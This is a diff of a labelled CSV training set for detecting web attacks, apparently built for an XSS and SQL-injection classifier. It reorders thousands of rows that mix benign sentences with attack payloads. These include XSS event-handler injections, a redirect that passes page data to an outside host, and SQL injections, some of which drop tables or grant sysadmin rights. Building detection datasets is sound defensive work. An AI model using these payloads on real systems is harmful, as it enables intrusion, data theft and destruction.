diff --git "a/train.csv" "b/train.csv" --- "a/train.csv" +++ "b/train.csv" @@ -1,16572 +1,16569 @@ Payload,Label,text_label,ID -Picking select.,0,normal,24779 -"test",1,XSS,3527 -select @@version,2,SQLi,10028 -"</space,1,XSS,7639 -"{""id"":null,""firstName"":""Jessie"",""lastName"":""Ting"",",0,normal,27244 -<menu id=x contextmenu=x onshow=alert(1)>right cli,1,XSS,9235 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10783 -"-3758' ) ) union all select 9460,9460,9460,9460,94",2,SQLi,19950 -"<iframe onclick=""alert(1)"">test</iframe>",1,XSS,7832 -1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5)),2,SQLi,11334 -"1"" ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ",2,SQLi,14669 -"1"" ) union all select null,null,null--",2,SQLi,21703 -"<noscript onkeydown=""alert(1)"" contenteditable>tes",1,XSS,2597 -"{""id"":null,""name"":""Breakdramon""}",0,normal,27132 -"<source onmouseup=""alert(1)"">test</source>",1,XSS,4798 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4489 -1'|| ( select 'lmsc' from dual where 1162 = 1162 o,2,SQLi,16521 +"1"" ) and row ( 6237,7469 ) > ( select count ( * ) ",2,SQLi,16390 +"<object classid=""clsid:02BF25D5-8C17-4B23-BC80-D34",1,XSS,9237 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10785 +1' ( select ( case when ( 5451 = 5451 ) then regex,2,SQLi,21744 +"<hr draggable=""true"" ondrag=""alert(1)"">test</hr>",1,XSS,7834 +select ( case when ( 9388 = 4322 ) then 1 else 938,2,SQLi,17451 +"1 and extractvalue ( 7982,concat ( 0x5c,0x7171706a",2,SQLi,14662 +1 ) as auly where 4146 = 4146 or elt ( 5873 = 5873,2,SQLi,18285 +"<blink oncontextmenu=""alert(1)"">test</blink>",1,XSS,2598 +"-9003"" ) ) union all select 9721,9721--",2,SQLi,20378 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4800 +"<cite onmouseout=""alert(1)"">test</cite>",1,XSS,4491 +-1190' or 4144 = ( select upper ( xmltype ( chr ( ,2,SQLi,16519 "<svg onLoad svg onLoad=""javascript:javascript:aler",1,XSS,378 "<script\x2Ftype=""text/javascript"">javascript:alert",1,XSS,358 -cos,0,normal,23214 -1' or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||ch,2,SQLi,19814 -Search for DNS Servers and select it from the drop,0,normal,25694 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8725 -ORDER BY 20,2,SQLi,10324 -1'|| ( select 'hwyv' from dual where 1155 = 1155 a,2,SQLi,19500 -"-1600%"" ) ) ) or elt ( 4568 = 7693,7693 ) and ( ( ",2,SQLi,16508 -"<style onpaste=""alert(1)"" contenteditable>test</st",1,XSS,5538 -Select a method to unwind.,0,normal,24143 +-4607'|| ( select 'wkdg' where 7524 = 7524 order b,2,SQLi,12833 +1 or exp ( ~ ( select * from ( select concat ( 0x7,2,SQLi,19812 +SELECT,0,normal,25691 +"<style>@keyframes x{}</style><rb style=""animation-",1,XSS,8727 +ORDER BY 22,2,SQLi,10326 +"1"" ) and 8407 = ( select count ( * ) from generate",2,SQLi,14084 +1' ) or 7417 = ( select count ( * ) from sysibm.sy,2,SQLi,16506 +"<bgsound onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,5540 +Select the perfect outfit for an event.,0,normal,24140 /><img/onerror=\x20javascript:alert(1)\x20src=xxx:,1,XSS,601 -"<rtc onmouseleave=""alert(1)"">test</rtc>",1,XSS,2088 -<X OnXxx=1,1,XSS,9058 -Select your exchange.,0,normal,25046 -":ex/**//*/*/pression(alert(""""))'>",1,XSS,7505 -1' where 8159 = 8159 union all select null#,2,SQLi,18495 -Select aid.,0,normal,24736 -"1"" ) ) ) or 7552 = ( select count ( * ) from rdb$f",2,SQLi,13115 -1' or exp ( ~ ( select * from ( select concat ( 0x,2,SQLi,19501 -<embed onfocusout=alert(1) tabindex=1 id=x></embed,1,XSS,5810 -"benchmark(50000000,MD5(1))",2,SQLi,10385 -"1' in boolean mode ) union all select null,null,nu",2,SQLi,14851 -"<multicol onkeypress=""alert(1)"" contenteditable>te",1,XSS,4353 -"<button oncontextmenu=""alert(1)"">test</button>",1,XSS,7145 -"<article oncut=""alert(1)"" contenteditable>test</ar",1,XSS,6065 -"-3933' ) ) ) union all select 6198,6198,6198,6198,",2,SQLi,12409 -1 ) as ztrb where 1052 = 1052 and ( select * from ,2,SQLi,20499 -"-3794' ) union all select 2485,2485,2485,2485,2485",2,SQLi,12105 -"{""id"":null,""name"":""check ship go""}",0,normal,27236 -<dir id=x tabindex=1 onactivate=alert(1)></dir>,1,XSS,8806 -1'+ ( select gkve where 1943 = 1943 waitfor delay ,2,SQLi,16470 -"{""id"":null,""name"":""buy""}",0,normal,27016 --4882' order by 1#,2,SQLi,19609 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6057 -1 rlike ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,18623 -Select a facial mask for skincare.,0,normal,24170 -Let's decide where to go for our next adventure.,0,normal,23734 -1 where 7464 = 7464 rlike ( select ( case when ( 7,2,SQLi,19637 -1 or 7552 = ( select count ( * ) from rdb$fields a,2,SQLi,13125 -"1, ( select ( case when ( 7711 = 7711 ) then 1 els",2,SQLi,20036 -</title><script>alert(1);</script>,1,XSS,9449 -"<dt onmouseup=""alert(1)"">test</dt>",1,XSS,5386 -"1%"" ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d4",2,SQLi,20716 -<spacer onpointerup=alert(1)>XSS</spacer>,1,XSS,4319 -"<picture draggable=""true"" ondrag=""alert(1)"">test</",1,XSS,2653 -"<img onmouseleave=""alert(1)"">test</img>",1,XSS,6018 -"1"" ) ) as gqxk where 9199 = 9199 and 3754 = ( sele",2,SQLi,19753 -select ( case when ( 5203 = 6330 ) then 5203 else ,2,SQLi,16520 -Group data where applicable.,0,normal,23269 -"{""id"":null,""name"":""mouse bag""}",0,normal,26831 -select ( case when ( 2774 = 5503 ) then 2774 else ,2,SQLi,12442 -<isindex type=image onload=alert(1) src=validimage,1,XSS,6474 -"1' or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,17991 +"<legend oncopy=""alert(1)"" contenteditable>test</le",1,XSS,2089 +<Z oncut=alert()>x,1,XSS,9060 +Select your diversify.,0,normal,25043 +"<canvas draggable=""true"" ondrag=""alert(1)"">test</c",1,XSS,7507 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,16741 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,12226 +if ( 2697 = 2008 ) select 2697 else drop function ,2,SQLi,17858 +"1"" ) ) ) union all select null#",2,SQLi,19499 +"<style>@keyframes x{}</style><summary style=""anima",1,XSS,5812 +"benchmark(50000000,MD5(1))#",2,SQLi,10387 +"1"" ) and 6414 = ( select count ( * ) from rdb$fiel",2,SQLi,15558 +<track onblur=alert(1) tabindex=1 id=x></track><in,1,XSS,4355 +"<figure ondblclick=""alert(1)"">test</figure>",1,XSS,7147 +"<p onmouseenter=""alert(1)"">test</p>",1,XSS,6067 +"Then, you'll need to select Download.",0,normal,25337 +1'|| ( select 'nfgq' where 1837 = 1837 and char ( ,2,SQLi,20497 +"1' in boolean mode ) union all select null,null,nu",2,SQLi,13352 +"{""id"":null,""firstName"":""Tony"",""lastName"":""Wang"",""s",0,normal,27234 +<ol id=x tabindex=1 onfocusin=alert(1)></ol>,1,XSS,8808 +"1"" where 5353 = 5353 and exp ( ~ ( select * from (",2,SQLi,15472 +"{""id"":null,""name"":""born""}",0,normal,27013 +1' ) ) and 3707 = ( select count ( * ) from sysibm,2,SQLi,17676 +"<param onmouseout=""alert(1)"">test</param>",1,XSS,6059 +-6125'|| ( select 'hwnm' where 1428 = 1428 union a,2,SQLi,18621 +Select the best camera settings for photography.,0,normal,24167 +"1"" ) ) as wwqj where 3249 = 3249 and 9254 = ( sele",2,SQLi,16498 +"1"" ) or 2367 = ( select count ( * ) from rdb$field",2,SQLi,19635 +"-6292 ) union all select 7499,7499,7499,7499,7499,",2,SQLi,13118 +"1"" where 8387 = 8387",2,SQLi,20034 +"<input type=image src onerror=""prompt(1)"">",1,XSS,9451 +<blockquote id=x tabindex=1 onfocus=alert(1)></blo,1,XSS,5388 +"{""id"":null,""name"":""needle""}",0,normal,26792 +<tbody id=x tabindex=1 ondeactivate=alert(1)></tbo,1,XSS,4321 +"<command onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,2654 +<svg><head onload=alert(1)></head>,1,XSS,6020 +Where's the reflexologist?,0,normal,23647 +Where's your SQL knowledge?,0,normal,23378 +Retrieve data where available.,0,normal,23266 +1' ) where 6248 = 6248 and 2388 = benchmark ( 5000,2,SQLi,21615 +"a' or 1 = 1,",2,SQLi,11946 +<strike onpointerout=alert(1)>XSS</strike>,1,XSS,6476 +"-5652%' ) union all select 4447,4447,4447,4447,444",2,SQLi,17989 "<iframe><img title=""</iframe><img src onerror=aler",1,XSS,114 -Only a select few will have to work past 70.,0,normal,25821 +1' and 8514 = ( select count ( * ) from domain.dom,2,SQLi,12184 "ABC<div style=""x:\xE2\x80\x8Aexpression(javascript",1,XSS,473 --3339' or 8571 = 8571--,2,SQLi,16633 -1 ) as xwgf where 4204 = 4204 and sleep ( 5 ) --,2,SQLi,16884 -"1"" ) where 6065 = 6065 and 6510 = ( select count (",2,SQLi,20486 -"1 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ",2,SQLi,12452 -<svg><blink onload=alert(1)></blink>,1,XSS,5867 -1'|| ( select 'kptj' from dual where 5123 = 5123,2,SQLi,16651 -1,0,normal,26701 -hi' or 'x'='x';,2,SQLi,10120 -"1 union all select null,null,null,null,null,null,n",2,SQLi,13303 +"iif ( 7011 = 2522,1,1/0 )",2,SQLi,16631 +select case when 6229 = 2077 then 1 else null end-,2,SQLi,12557 +1'|| ( select 'sdll' where 5074 = 5074 or ( select,2,SQLi,20484 +"1"" procedure analyse ( extractvalue ( 9627,concat ",2,SQLi,16416 +<style>@keyframes slidein {}</style><address style,1,XSS,5869 +"{""id"":null,""name"":""Cottonee""}",0,normal,27306 +1,0,normal,26698 +or 'whatever' in ('whatever'),2,SQLi,10122 +"select * from users where id = '1' union select ""?",2,SQLi,11614 "<form><iframe &#09;&#10;&#11; src=""javascript&#58;",1,XSS,849 -"<colgroup onpaste=""alert(1)"" contenteditable>test<",1,XSS,5050 -"<label draggable=""true"" ondrag=""alert(1)"">test</la",1,XSS,4572 -"1"" ) ) ) and 3707 = ( select count ( * ) from sysi",2,SQLi,21575 -"1%"" or ( select * from ( select ( sleep ( 5 ) ) ) ",2,SQLi,17823 -"Pick the ride mode and tap ""Select"" to order your ",0,normal,25779 -"<section oncut=""alert(1)"" contenteditable>test</se",1,XSS,3774 -"1"" ) ) ) and make_set ( 7809 = 9564,9564 ) and ( (",2,SQLi,21505 -Update the calendar events.,0,normal,22608 -)) RLIKE SLEEP(5) AND (('1337' LIKE '1337,2,SQLi,11230 -1,0,normal,26663 -"-9456%"" ) ) or 3440 = cast ( ( chr ( 113 ) ||chr (",2,SQLi,14407 -select * from users where id = 1.<@. union select ,2,SQLi,11805 +"<q onkeydown=""alert(1)"" contenteditable>test</q>",1,XSS,5052 +<thead onpointerdown=alert(1)>XSS</thead>,1,XSS,4574 +1'|| ( select 'lije' from dual where 5309 = 5309 a,2,SQLi,13901 +"-5292' ) union all select 1439,1439,1439,1439#",2,SQLi,19791 +As it would be impossible within the limits of thi,0,normal,26350 +<button onpointerdown=alert(1)>XSS</button>,1,XSS,3776 +1 ) where 6720 = 6720 or ( select 2* ( if ( ( sele,2,SQLi,20601 +Where's the best spot to watch the sunrise?,0,normal,23863 +"1"" ) ) and 4386 = utl_inaddr.get_host_address ( ch",2,SQLi,17790 +1,0,normal,26706 +#ERROR!,2,SQLi,22530 +select * from users where id = '1' + $+%\ or 1 = 1,2,SQLi,11608 <video><source onerror=location=/\02.rs/+document.,1,XSS,136 -As well as the joint Work and Pensions Select Comm,0,normal,26346 -Select lead.,0,normal,24658 -"-6890"" ) ) or 5903 = ( 'qqpjq'|| ( select case 590",2,SQLi,18467 -1 ) where 1090 = 1090 and 6240 = ( 'qqpjq'|| ( sel,2,SQLi,19396 --7633' ) as aslj where 2317 = 2317 or 8571 = 8571-,2,SQLi,21106 -"1"" ) and sleep ( 5 ) and ( ""fsuf"" like ""fsuf",2,SQLi,21096 -"1%' ) ) ) or 8384 = like ( 'abcdefg',upper ( hex (",2,SQLi,16650 -"<head oncut=""alert(1)"" contenteditable>test</head>",1,XSS,2585 -1' ( select ( case when ( 5451 = 5451 ) then regex,2,SQLi,20625 -I need to select the right tools for the job.,0,normal,23741 -ORDER BY 7#,2,SQLi,10280 -"<ruby onmouseenter=""alert(1)"">test</ruby>",1,XSS,8791 --3431%' ) or 9323 = 9323#,2,SQLi,12755 -"<thead draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,3040 -1 ) or 2367 = ( select count ( * ) from rdb$fields,2,SQLi,17021 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,17689 -<style>:target {color: red;}</style><figure id=x s,1,XSS,3998 --5031' or 9323 = 9323#,2,SQLi,18412 -"1"" ) as ronb where 9368 = 9368",2,SQLi,18186 -"<picture onpaste=""alert(1)"" contenteditable>test</",1,XSS,6567 -Select your dream reception venue.,0,normal,24369 -"{""id"":null,""name"":""Probopass""}",0,normal,27368 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11107 -1' and 5556 = ( select count ( * ) from all_users ,2,SQLi,19963 +"1"" ) as semi where 4260 = 4260",2,SQLi,16823 +1 ) as vzyk where 5103 = 5103 and 8312 = dbms_pipe,2,SQLi,18682 +-8069' ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( ,2,SQLi,18465 +1 ) ) and 4386 = utl_inaddr.get_host_address ( chr,2,SQLi,19394 +end and ( ( ( '%' = ',2,SQLi,17380 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,21094 +-4373'+ ( select 'rlht' where 2285 = 2285 union al,2,SQLi,12563 +<ul onpointerup=alert(1)>XSS</ul>,1,XSS,2586 +1'|| ( select 'vuku' where 3143 = 3143 waitfor del,2,SQLi,13376 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,19084 +ORDER BY 9#,2,SQLi,10282 +<param id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,8793 +"-4856' in boolean mode ) union all select 1074,107",2,SQLi,12748 +"<br onmousedown=""alert(1)"">test</br>",1,XSS,3041 +-2823' ) ) or 5663 = 4228 and ( ( 'skgh' like 'skg,2,SQLi,17019 +"-5078 union all select 9708,9708--",2,SQLi,17687 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4000 +"-3805"" ) ) ) union all select 9123,9123,9123,9123,",2,SQLi,15300 +"1"" ) ) union all select null,null,null,null#",2,SQLi,18184 +"<marquee onclick=""alert(1)"">test</marquee>",1,XSS,6569 +"1, ( select ( case when ( 5777 = 5777 ) then 1 els",2,SQLi,15788 +1 ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ),2,SQLi,13943 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11109 +"1"" ) ) ) rlike sleep ( 5 ) #",2,SQLi,21252 "`""'><img src='#\x27 onerror=javascript:alert(1)>",1,XSS,426 --8722%' or 2724 in ( ( char ( 113 ) +char ( 113 ) ,2,SQLi,22281 -1' ) ) ) or 7552 = ( select count ( * ) from rdb$f,2,SQLi,18403 -"<meta onkeydown=""alert(1)"" contenteditable>test</m",1,XSS,5269 -"1%"" union all select null,null,null,null,null#",2,SQLi,12426 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4694 -1'+ ( select dnxi where 5850 = 5850 or 8156 = ( se,2,SQLi,21002 -"1"" ) where 4382 = 4382 and 6607 = 2394--",2,SQLi,21817 -"<b onmousemove=""alert(1)"">test</b>",1,XSS,6811 -"<style>@keyframes x{}</style><dialog style=""animat",1,XSS,2532 -"-5024%"" or make_set ( 3321 = 7355,7355 ) and ""%"" =",2,SQLi,15444 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11604 -Insert the data.,0,normal,22888 -1'+ ( select 'qylf' where 6984 = 6984 and 2255 = 5,2,SQLi,13272 -1' ) ) rlike ( select ( case when ( 7689 = 7689 ) ,2,SQLi,12784 -"<blockquote onmouseout=""alert(1)"">test</blockquote",1,XSS,7016 -"1 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113",2,SQLi,13119 -"<ins onmouseout=""alert(1)"">test</ins>",1,XSS,4112 -1' ) ) as hxxm where 3792 = 3792 and sleep ( 5 ) #,2,SQLi,15498 -1' ) ) as gqzy where 2312 = 2312 or 5286 = ( selec,2,SQLi,20655 -1 ) where 4479 = 4479 rlike ( select ( case when (,2,SQLi,14614 -<isindex onblur=alert(1) tabindex=1 id=x></isindex,1,XSS,5361 -"admin' and substring(password/text(),1,1)='7",2,SQLi,10026 -Where's your SQL reference?,0,normal,23405 -"-6970"" ) ) or 1570 = convert ( int, ( select char ",2,SQLi,20859 -<video src/onerror=alert(1)>,1,XSS,5236 -I need to decide where to go for a cultural event.,0,normal,23885 -Tap and select the speech you want read back to yo,0,normal,25505 -"<tbody onmouseup=""alert(1)"">test</tbody>",1,XSS,2198 -"{""id"":null,""firstName"":""Ros"",""lastName"":""Probo"",""a",0,normal,26879 -It's pretty easy to select one and tweak their app,0,normal,25938 -Select main dish.,0,normal,24436 -1' ) as lgex where 4068 = 4068 and 1378 = 9247--,2,SQLi,19474 -"<bdi onclick=""alert(1)"">test</bdi>",1,XSS,8701 -Join fitness class.,0,normal,22773 +-8612'+ ( select 'iqla' where 5035 = 5035 union al,2,SQLi,22279 +"-8331' ) union all select 1452,1452,1452,1452,1452",2,SQLi,18401 +"<thead onmouseout=""alert(1)"">test</thead>",1,XSS,5271 +"1%"" ) ) and elt ( 4249 = 4249,7259 ) and ( ( ""%"" =",2,SQLi,12419 +<svg id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,4696 +"{""id"":null,""firstName"":""Sally"",""lastName"":""Toh"",""a",0,normal,27282 +"1' or extractvalue ( 1297,concat ( 0x5c,0x7171706a",2,SQLi,21815 +"<ul onpaste=""alert(1)"" contenteditable>test</ul>",1,XSS,6813 +"<listing onbeforecut=""alert(1)"" contenteditable>te",1,XSS,2533 +Select glass.,0,normal,24521 +1' in boolean mode ) and 8189 = ( select count ( *,2,SQLi,12196 +Select the link.,0,normal,22885 +1' ) ) as myws where 5274 = 5274,2,SQLi,21039 +"-1513"" ) as swvd where 2958 = 2958 union all selec",2,SQLi,15338 +<time onpointerover=alert(1)>XSS</time>,1,XSS,7018 +Select view.,0,normal,24609 +"<source onkeypress=""alert(1)"" contenteditable>test",1,XSS,4114 +"-7320"" ) where 3907 = 3907 union all select 3907,3",2,SQLi,15364 +1' ) ) as dqdv where 8126 = 8126 and 4595 = 4595#,2,SQLi,17414 +"1%"" ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x69",2,SQLi,14607 +<style>:target {color: red;}</style><header id=x s,1,XSS,5363 +select @@version,2,SQLi,10028 +Where's the SQL resource?,0,normal,23402 +1%' ) ) and char ( 107 ) ||char ( 121 ) ||char ( 9,2,SQLi,15894 +"<shadow onmouseover=""alert(1)"">test</shadow>",1,XSS,5238 +I'm planning to pick up some gardening tools.,0,normal,23882 +"Tap the star button, and select one of the AR game",0,normal,25502 +"<rt onmousemove=""alert(1)"">test</rt>",1,XSS,2199 +"{""id"":null,""name"":""Vanillish""}",0,normal,26876 +"1"" rlike sleep ( 5 ) #",2,SQLi,15017 +We must select now.,0,normal,24433 +"1%"" rlike sleep ( 5 ) #",2,SQLi,19455 +"<hr onmousemove=""alert(1)"">test</hr>",1,XSS,8703 +"-5014"" ) or 2724 in ( ( char ( 113 ) +char ( 113 )",2,SQLi,13855 "<img \x11src=x onerror=""javascript:alert(1)"">",1,XSS,654 -"1%"" or 8384 = like ( 'abcdefg',upper ( hex ( rando",2,SQLi,18154 -1' ) as ubvf where 5923 = 5923 and 8490 = 4925--,2,SQLi,16444 -"<slot onkeypress=""alert(1)"" contenteditable>test</",1,XSS,7663 -"-3790"" ) as ojgb where 5925 = 5925 union all selec",2,SQLi,15213 -"<tfoot onmouseover=""alert(1)"">test</tfoot>",1,XSS,3235 -1 or 2633 = dbms_pipe.receive_message ( chr ( 112 ,2,SQLi,19921 -"iif ( 6307 = 2459,1,1/0 )",2,SQLi,19080 -"""),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20wait",2,SQLi,10919 -"<set attributeName=""xlink:href"" begin=""accessKey(c",1,XSS,9306 -Join the discussion forum.,0,normal,22732 -"SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(20",2,SQLi,22524 -1 ) ) ) ( select ( case when ( 5451 = 5451 ) then ,2,SQLi,21901 -<video id=x tabindex=1 onactivate=alert(1)></video,1,XSS,8566 -<style>:target {color: red;}</style><tr id=x style,1,XSS,2100 -Select the best wedding videographer.,0,normal,24383 -Retrieve rows where necessary.,0,normal,23357 -"1%"" ) and 4595 = 4595#",2,SQLi,21280 -1' ) ) rlike sleep ( 5 ) #,2,SQLi,19789 -Select your hope.,0,normal,24937 -); alert('XSS,1,XSS,1276 -"select * from users where id = 1 or 1#""; or 1 = 1 ",2,SQLi,11662 -1 or ( select * from ( select ( sleep ( 5 ) ) ) yd,2,SQLi,12588 -"<shadow oncontextmenu=""alert(1)"">test</shadow>",1,XSS,4305 +"1 ) procedure analyse ( extractvalue ( 9255,concat",2,SQLi,12713 +"1"" ) ) or 7552 = ( select count ( * ) from rdb$fie",2,SQLi,16442 +<figcaption onpointerenter=alert(1)>XSS</figcaptio,1,XSS,7665 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,16603 +"<sup draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,3237 +-4262%' ) ) ) or 4747 = dbms_utility.sqlid_to_sqlh,2,SQLi,22239 +"-5009 ) where 8463 = 8463 union all select 8463,84",2,SQLi,15560 +waitfor delay '0:0:20' /*,2,SQLi,10921 +<style>#x{font-family:foo[bar;color:green;}#y];col,1,XSS,9308 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,19952 +or''=',2,SQLi,22521 +"-9023%"" ) ) ) union all select 4490,4490,4490#",2,SQLi,21899 +"<plaintext onmouseenter=""alert(1)"">test</plaintext",1,XSS,8568 +"<ul draggable=""true"" ondragend=""alert(1)"">test</ul",1,XSS,2101 +"1"" ) ) as uels where 9447 = 9447 or 2633 = dbms_pi",2,SQLi,20250 +Check values where required.,0,normal,23354 +"-7499%"" ) union all select 1893,1893,1893,1893,189",2,SQLi,21278 +1' and 8514 = ( select count ( * ) from domain.dom,2,SQLi,16820 +1' ) where 8255 = 8255 or 1022 = ( select count ( ,2,SQLi,15383 +<script>alert(1);</script>,1,XSS,1277 +"1"" ) where 3679 = 3679",2,SQLi,14358 +"-2027%"" ) union all select 2048,2048,2048,2048,204",2,SQLi,12581 +"<picture oncut=""alert(1)"" contenteditable>test</pi",1,XSS,4307 "<script>({set/**/$($){_/**/setter=$,_=javascript:a",1,XSS,711 -Select conceal.,0,normal,24687 -1%' ) ) waitfor delay '0:0:5' and ( ( '%' = ',2,SQLi,19576 -admin' --,2,SQLi,9902 -"<dl onkeydown=""alert(1)"" contenteditable>test</dl>",1,XSS,2133 -1 where 3502 = 3502 order by 1--,2,SQLi,15910 -1 where 3737 = 3737 or 4915 = ( select count ( * ),2,SQLi,21833 -"1%"" and 8148 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,15572 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10732 --5356' ) or 9323 = 9323#,2,SQLi,16795 -"-5728 ) where 8663 = 8663 union all select 8663,86",2,SQLi,17743 -"1"" ) where 8153 = 8153",2,SQLi,22475 -"{""id"":null,""firstName"":""Damien"",""lastName"":""Gareth",0,normal,27212 -<SCRIPT+FOR=document+EVENT=onreadystatechange>Mous,1,XSS,9055 -; drop table temp --,2,SQLi,10042 -Select guest room entrances exhibit art inspired b,0,normal,25625 -1 ) as mtda where 3951 = 3951,2,SQLi,12638 -admin' or 1=1/*,2,SQLi,9913 -1'|| ( select 'ymez' from dual where 9870 = 9870 o,2,SQLi,12838 -a' or 3 = 3--,2,SQLi,11727 -1' in boolean mode ) and ( select 2* ( if ( ( sele,2,SQLi,19365 -Select your Internet connection type from the list,0,normal,25566 -Select place.,0,normal,24544 -"<br onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,8831 -"<ul oncut=""alert(1)"" contenteditable>test</ul>",1,XSS,4133 -"<colgroup onkeydown=""alert(1)"" contenteditable>tes",1,XSS,4623 +"-5832"" ) or 1650 = 9011--",2,SQLi,20923 +"1 and row ( 6237,7469 ) > ( select count ( * ) ,co",2,SQLi,19574 +admin'/*,2,SQLi,9904 +<style>:target {color: red;}</style><dir id=x styl,1,XSS,2134 +select current_setting('log_connections');,2,SQLi,22504 +1 ) where 5464 = 5464 or 1022 = ( select count ( *,2,SQLi,21831 +-4322' ) ) as magw where 1627 = 1627 or 4747 = dbm,2,SQLi,15564 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10734 +"-1993%"" ) or 5903 = ( 'qqpjq'|| ( select case 5903",2,SQLi,16793 +1 ) as ndgd where 2367 = 2367 or 8156 = ( select c,2,SQLi,13419 +-5089' ) ) as icbb where 1129 = 1129 or 6250 = 965,2,SQLi,22472 +"{""id"":null,""firstName"":""Suan Choo"",""lastName"":""Lee",0,normal,27210 +"<SVg </onlOad =""1> (_=prompt,_(1)) """">",1,XSS,9057 +"exec sp_addsrvrolemember 'name' , 'sysadmin' --",2,SQLi,10044 +Select Internet Protocol Version 47003 (or Version,0,normal,25622 +"-6747"" or 9323 = 9323#",2,SQLi,12631 +admin') or ('1'='1'--,2,SQLi,9915 +1' ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( ,2,SQLi,12458 +select * from users where id = 1 union select +!<@,2,SQLi,11720 +"{""id"":null,""firstName"":""Ken"",""lastName"":""Tan Chye""",0,normal,27321 +Selecting table linens can be confusing because th,0,normal,25563 +1' ) where 8086 = 8086 and 1430 = 7941--,2,SQLi,22007 +"<param onmousedown=""alert(1)"">test</param>",1,XSS,8833 +<button onblur=alert(1) id=x></button><input autof,1,XSS,4135 +"<time onmousedown=""alert(1)"">test</time>",1,XSS,4625 `'><script>\xE2\x80\xA8javascript:alert(1)</script,1,XSS,567 -Do you hate how sharing from a widescreen / high r,0,normal,26504 -`'><script>\xC2\x85javascript:alert(525)</script>,1,XSS,8974 -waitfor delay '0:0:5'-- thuo,2,SQLi,13903 -"-9462"" ) as vzga where 4799 = 4799 or 8691 = 1048",2,SQLi,22244 -"-1543%' union all select 9341,9341,9341,9341,9341,",2,SQLi,22028 -"<ul onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,5382 -"1 ) ) ) and 3202 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,21745 -<style>:target {transform: rotate(180deg);}</style,1,XSS,5459 -"1"" ) ) ) and sleep ( 5 ) and ( ( ( ""bvgg"" = ""bvgg",2,SQLi,17836 -The automaker announced today a feature that will ,0,normal,25484 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10735 -"1"" where 5977 = 5977",2,SQLi,21156 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6948 -1' ) as hlbq where 2347 = 2347 and 6055 = ctxsys.d,2,SQLi,18787 -"1%"" ) ) ) rlike sleep ( 5 ) and ( ( ( ""%"" = """,2,SQLi,17441 -[a](javascript://www.google.com%0Aprompt(1)),1,XSS,9432 -"-2006' ) ) union all select 7852,7852,7852,7852,78",2,SQLi,19003 -"1' in boolean mode ) union all select null,null,nu",2,SQLi,13352 -"-4076' ) ) union all select 9030,9030,9030,9030,90",2,SQLi,12365 -"<small onbeforecut=""alert(1)"" contenteditable>test",1,XSS,1796 -"1"" where 5216 = 5216 or 5286 = ( select count ( * ",2,SQLi,19908 -1 ) and 6537 = dbms_pipe.receive_message ( chr ( 7,2,SQLi,13869 -"&lt;A HREF=\""http&#58;//google&#58;ha&#46;ckers&#4",1,XSS,1058 -ý or 1=1 --,2,SQLi,10157 -"<source onkeydown=""alert(1)"" contenteditable>test<",1,XSS,7688 -<span onblur=alert(1) tabindex=1 id=x></span><inpu,1,XSS,2630 -1' ) ) or 5286 = ( select count ( * ) from all_use,2,SQLi,17406 -<iframe onpointerout=alert(1)>XSS</iframe>,1,XSS,2732 -"<element onbeforecut=""alert(1)"" contenteditable>te",1,XSS,4817 -"select sleep ( 5 ) and ( ( ""rthl"" like ""rthl",2,SQLi,17524 -) or (a=a,2,SQLi,10160 -"<body onresize=""alert(1)"">",1,XSS,5647 -Select the best wedding planner.,0,normal,24363 -1' ) and ( select * from ( select ( sleep ( 5 ) ) ,2,SQLi,15240 -"-5360' where 8178 = 8178 union all select 8178,817",2,SQLi,19686 -Select your dream wedding flowers.,0,normal,24391 -"<style></style\x0D<img src=""about:blank"" onerror=j",1,XSS,446 -Specify conditions where necessary.,0,normal,23461 -"<tbody draggable=""true"" ondrag=""alert(1)"">test</tb",1,XSS,8914 -"<frame onmousemove=""alert(1)"">test</frame>",1,XSS,4801 -"1 ) and elt ( 4249 = 4249,7259 ) and ( 8226 = 8226",2,SQLi,15401 -<svg><data 